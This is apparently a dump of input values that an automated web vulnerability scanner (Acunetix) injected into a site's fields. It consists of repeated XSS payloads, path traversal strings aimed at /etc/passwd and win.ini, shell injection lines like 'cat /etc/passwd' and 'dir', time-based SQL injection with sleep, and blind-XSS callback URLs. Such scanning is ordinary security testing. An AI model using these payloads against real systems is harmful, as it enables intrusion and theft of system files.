\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(932918)</ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?906926></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(962888)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(988099)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9557356*9369949)

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(957859)"></g></svg>

&cat /etc/passwd&

1

1

1

'+response.write(9557356*9369949)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'&cat /etc/passwd&'

1<div style=width:expression(prompt(971040))>

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9557356*9369949)+"

1

1

../../../../../../../../../../etc/passwd

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

WEB-INF/web.xml

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

cat /etc/passwd

1

1<body onload=prompt(940093)>

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

${100041+99667}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(986444)>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1<img src=xyz OnErRor=prompt(908045)>

1

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n995497=v927638

-1

1

1

1<img/src=">" onerror=alert(979916)>

)

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1

1

-1)

1

1<ScRiPt%20>prompt(904789)</sCripT>

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

1&lt

1

"|"ld

-1))

1

^(#$!@#$)(()))******

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'

\xf6<img acu onmouseover=prompt(956534) //\xf6>

1

Ewf9HQA9'

1

1

1

/etc/passwd

1

1<input autofocus onfocus=prompt(968116)>

"

'

HWAtT2L1')

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

<a href='http://www.acunetix.com'>website security</a>

1

n99TZP5z'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

"

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

acunetix_wvs_invalid_filename

-1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitgXnBLnYF68.bxss.me/

1_uEQiF <ScRiPt >prompt(942782)</ScRiPt>

1

1

comments

1

-1)

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

&dir

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

-1))

1

http://www.acunetix.tst

1

comments/.

1

'&dir&'

1

AN5n7kQr'

1

1

1'"()&%<ScRiPt >prompt(926158)</ScRiPt>

'"

file:///etc/passwd

"&dir&"

1

vnbUIFTJ')

1

1

/\../\../\../\../\../\../\../etc/passwd

<!--

'"()&%<ScRiPt >prompt(976870)</ScRiPt>

1

|dir

1

1

X0F8OUip'))

WEB-INF/web.xml

1

1

'|dir

1_955879

1

1

1

1

1

WEB-INF\web.xml

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu4788\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4788

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

acux5943\xc0\xbez1\xc0\xbcz2a\x90bcxuca5943

1

................windowswin.ini

1

1

1<ScRiPt >prompt(960065)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(907493)</script>

1

1

1

1<ScRiPt >prompt(978342)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

response.write(9502035*9359645)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?958423></ScRiPt>

1

1

1

'+response.write(9502035*9359645)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(983218)</ScRiPt>

&cat /etc/passwd&

1

1

"+response.write(9502035*9359645)+"

'&cat /etc/passwd&'

1<video><source onerror="javascript:prompt(973902)">

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(945729)"></g></svg>

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

1

1

cat /etc/passwd

1<div style=width:expression(prompt(958117))>

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

WEB-INF\web.xml

`cat /etc/passwd`

1<iframe src='data:text/html

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

|cat /etc/passwd#

1<body onload=prompt(997818)>

1

${99931+100469}

1

1

1

-1

1

'|'ld

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973750)>

1

1

1&n904998=v976200

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

"|"ld

1<img src=xyz OnErRor=prompt(930089)>

)

1

1

-1))

1

1some_inexistent_file_with_long_name%00.jpg

'"()

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(916225)>

!(()&&!|*|*|

1

s3oZMSTu'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<ScRiPt%20>prompt(939219)</sCripT>

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

^(#$!@#$)(()))******

'

1

wCjwOfBf')

1

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1&lt

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

DJjtEccL'))

"

1

1

/etc/passwd

1

1

1

\xf6<img acu onmouseover=prompt(925953) //\xf6>

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

-1

1

1

http://hit4LaK0HAv9j.bxss.me/

acunetix_wvs_invalid_filename

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<input autofocus onfocus=prompt(972878)>

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

-1)

1

1

1

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

-1))

'&dir&'

1

1

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

[url=http://www.acunetix.com]website security[/url]

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

B1RmiaNO'

http://www.acunetix.tst

"&dir&"

'"

comments/.

1_jIT75 <ScRiPt >prompt(948433)</ScRiPt>

1

1

1

BEtIyGcB')

1

<!--

1

|dir

1

1'"()&%<ScRiPt >prompt(924874)</ScRiPt>

1

RNDLXKiA'))

1

1

1

'|dir

file:///etc/passwd

1

1

1

1

'"()&%<ScRiPt >prompt(993326)</ScRiPt>

1

1

"|dir

1

1

1_988144

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

acu2559\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2559

1

1

../../../../../../../../../../boot.ini

1

1

acux4384\xc0\xbez1\xc0\xbcz2a\x90bcxuca4384

1

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(981960)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(951419)</script>

1

1

1

1<ScRiPt >prompt(989405)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?929762></ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(941579)</ScRiPt>

1

response.write(9776068*9405447)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'+response.write(9776068*9405447)+'

1<video><source onerror="javascript:prompt(918441)">

1

1

&cat /etc/passwd&

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(911144)"></g></svg>

"+response.write(9776068*9405447)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<div style=width:expression(prompt(983091))>

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF/web.xml

1<iframe src='data:text/html

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<body onload=prompt(928047)>

1

if(now()=sysdate(),sleep(9.048),0)/*'XOR(if(now()=sysdate(),sleep(9.048),0))OR'"XOR(if(now()=sysdate(),sleep(9.048),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(905835)>

1

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(9.048)))v)/*'+(select(0)from(select(sleep(9.048)))v)+'"+(select(0)from(select(sleep(9.048)))v)+"*/

1<img src=xyz OnErRor=prompt(989930)>

1

`cat /etc/passwd`

1

1

1

${99773+99288}

1

1<img/src=">" onerror=alert(957626)>

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

|cat /etc/passwd#

1

1<ScRiPt%20>prompt(968190)</sCripT>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n989492=v984521

1

1&lt

)

-1))

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(918191) //\xf6>

24fIvTws'

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1

'"()

1

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(977220)>

JTLcdpLD')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

CCfii8dR'))

<a href='http://www.acunetix.com'>website security</a>

/etc/passwd

1

1

1

1

'

"

1

-1

[url=http://www.acunetix.com]website security[/url]

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

"

1_0G3wL <ScRiPt >prompt(965336)</ScRiPt>

http://hit8LzraDNrAW.bxss.me/

1

acunetix_wvs_invalid_filename

1

-1))

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

TL92F3u9'

1

1

comments

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

nEdusOrq')

1

comments

1

http://www.acunetix.tst

1

1

'&dir&'

zoHSmr18'))

'"

1

1'"()&%<ScRiPt >prompt(937039)</ScRiPt>

comments/.

file:///etc/passwd

1

1

<!--

'"()&%<ScRiPt >prompt(927770)</ScRiPt>

1

1

1

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

1_913442

1

1

1

|dir

1

1

1

WEB-INF/web.xml

1

'|dir

1

1

"|dir

WEB-INF\web.xml

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

acu2229\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2229

1

../../../../../../../../../../windows/win.ini.jpg

1

acux7444\xc0\xbez1\xc0\xbcz2a\x90bcxuca7444

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(980517)</ScRiPt>

1

1

1

1<script>prompt(911200)</script>

................windowswin.ini

1

1

1<ScRiPt >prompt(910635)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?919819></ScRiPt>

1

1

1

1<ScRiPt >prompt(959365)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<video><source onerror="javascript:prompt(968668)">

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(932752)"></g></svg>

1

1

1

response.write(9542454*9083949)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(946339))>

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9542454*9083949)+'

1

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9542454*9083949)+"

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(967571)>

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF/web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988158)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

WEB-INF\web.xml

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1<img src=xyz OnErRor=prompt(980104)>

-1

1

1

1

${100398+99411}

1

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(992995)>

-1)

1

1&n973361=v971304

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1))

1<ScRiPt%20>prompt(950576)</sCripT>

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

1

)

1some_inexistent_file_with_long_name%00.jpg

xUSKoqFt'

1&lt

1

1

NFAzYF1A')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

"|"ld

1

^(#$!@#$)(()))******

\xf6<img acu onmouseover=prompt(914204) //\xf6>

4ET9AMAU'))

testasp.vulnweb.com

1

1

/etc/passwd

1

'

1

1<input autofocus onfocus=prompt(955469)>

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1)

1

"

1

'

<a href='http://www.acunetix.com'>website security</a>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

"

1

${@print(md5(acunetix_wvs_security_test))}

1

[url=http://www.acunetix.com]website security[/url]

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

0rikoT2e'

http://hitDqubTR9xv1.bxss.me/

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

1_EdgTs <ScRiPt >prompt(943871)</ScRiPt>

comments

cfAEtcpV')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

&dir

1

1

1

1

comments

1

YmwnQjwr'))

'&dir&'

file:///etc/passwd

'"

http://www.acunetix.tst

1

1

comments/.

1'"()&%<ScRiPt >prompt(920034)</ScRiPt>

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

<!--

1

1

'"()&%<ScRiPt >prompt(919717)</ScRiPt>

1

1

|dir

1

WEB-INF/web.xml

1

1

1

1_940439

1

1

WEB-INF\web.xml

1

'|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

"|dir

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu3715\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3715

1

1

1

acux1374\xc0\xbez1\xc0\xbcz2a\x90bcxuca1374

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(975717)</ScRiPt>

1

1

1<script>prompt(905086)</script>

1

................windowswin.ini

1<ScRiPt >prompt(959519)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?912355></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(975919)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<video><source onerror="javascript:prompt(969426)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

response.write(9955595*9445062)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936929)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1

'+response.write(9955595*9445062)+'

1<div style=width:expression(prompt(928524))>

1

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9955595*9445062)+"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<iframe src='data:text/html

WEB-INF/web.xml

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

../../../../../../../../../../etc/passwd.jpg

1<body onload=prompt(914934)>

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

cat /etc/passwd

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(970708)>

1

1

1

`cat /etc/passwd`

-1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(988685)>

1

1

1

|cat /etc/passwd#

1

-1)

1

${99844+100199}

1

1<img/src=">" onerror=alert(905968)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'|'ld

1

1

-1))

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt%20>prompt(994855)</sCripT>

1

"|"ld

1&n981898=v903654

1

wzologIU'

1

)

1some_inexistent_file_with_long_name%00.jpg

/etc/passwd

1&lt

1

1

zkIcgxS9')

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'"()

'

\xf6<img acu onmouseover=prompt(943753) //\xf6>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

277YMNP2'))

1

^(#$!@#$)(()))******

testasp.vulnweb.com

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1<input autofocus onfocus=prompt(948337)>

'

-1

1

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

-1)

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

-1))

[url=http://www.acunetix.com]website security[/url]

&dir

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

1

1

1

1_TYjBw <ScRiPt >prompt(951547)</ScRiPt>

EMUEpnvT'

'&dir&'

1

file:///etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

Z0jFkpaE')

1

comments

http://hitPpA2V0w9Wx.bxss.me/

1

1

/\../\../\../\../\../\../\../etc/passwd

1

T1gjoWPQ'))

"&dir&"

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

1

1

1

|dir

WEB-INF/web.xml

1

1

1

comments/.

http://www.acunetix.tst

'"

1

WEB-INF\web.xml

'|dir

1

1

1

1'"()&%<ScRiPt >prompt(940650)</ScRiPt>

<!--

1

1

1

"|dir

../../../../../../../../../../windows/win.ini

'"()&%<ScRiPt >prompt(907270)</ScRiPt>

1

1

1

../../../../../../../../../../boot.ini

1

1

1_988766

1

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acu3591\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3591

1

1

acux4886\xc0\xbez1\xc0\xbcz2a\x90bcxuca4886

1

................windowswin.ini

1

1<ScRiPt >prompt(983947)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(909456)</script>

1

1

1

1<ScRiPt >prompt(943786)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?945834></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(971871)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(977384)">

response.write(9914377*9163203)

1

1

1

'+response.write(9914377*9163203)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(915161)"></g></svg>

WEB-INF/web.xml

1

1

&cat /etc/passwd&

"+response.write(9914377*9163203)+"

1

WEB-INF\web.xml

1<div style=width:expression(prompt(991265))>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

1

1

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(968524)>

../../../../../../../../../../etc/passwd.jpg

1

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

cat /etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(930501)>

${100227+100062}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(930168)>

1

1

1

`cat /etc/passwd`

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1

1

1<img/src=">" onerror=alert(952502)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&n958975=v991754

1

-1))

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

1<ScRiPt%20>prompt(910538)</sCripT>

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

nRccptXZ'

1

'|'ld

testasp.vulnweb.com

'"()

!(()&&!|*|*|

1

qwvdmlpl')

1&lt

/etc/passwd

1

1

1

"|"ld

^(#$!@#$)(()))******

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

\xf6<img acu onmouseover=prompt(908507) //\xf6>

1

sfzL8WjM'))

"

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<input autofocus onfocus=prompt(968395)>

${@print(md5(acunetix_wvs_security_test))}

-1

1

1

1

1

'

1

${@print(md5(acunetix_wvs_security_test))}\

<a href='http://www.acunetix.com'>website security</a>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1)

acunetix_wvs_invalid_filename

1

http://hitdedu2s8P8T.bxss.me/

1

"

1

[url=http://www.acunetix.com]website security[/url]

1

1

comments

-1))

||cat /etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1_c5FqI <ScRiPt >prompt(921515)</ScRiPt>

1

1

comments

ruJnZDAE'

file:///etc/passwd

&dir

1

http://www.acunetix.tst

1

1

comments/.

'"

y7rMchlg')

1

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

1

1

1'"()&%<ScRiPt >prompt(993349)</ScRiPt>

1

<!--

IPCKFIF7'))

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(974586)</ScRiPt>

1

"&dir&"

1

1

1

1

1

1

|dir

1_979691

WEB-INF\web.xml

1

1

1

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

"|dir

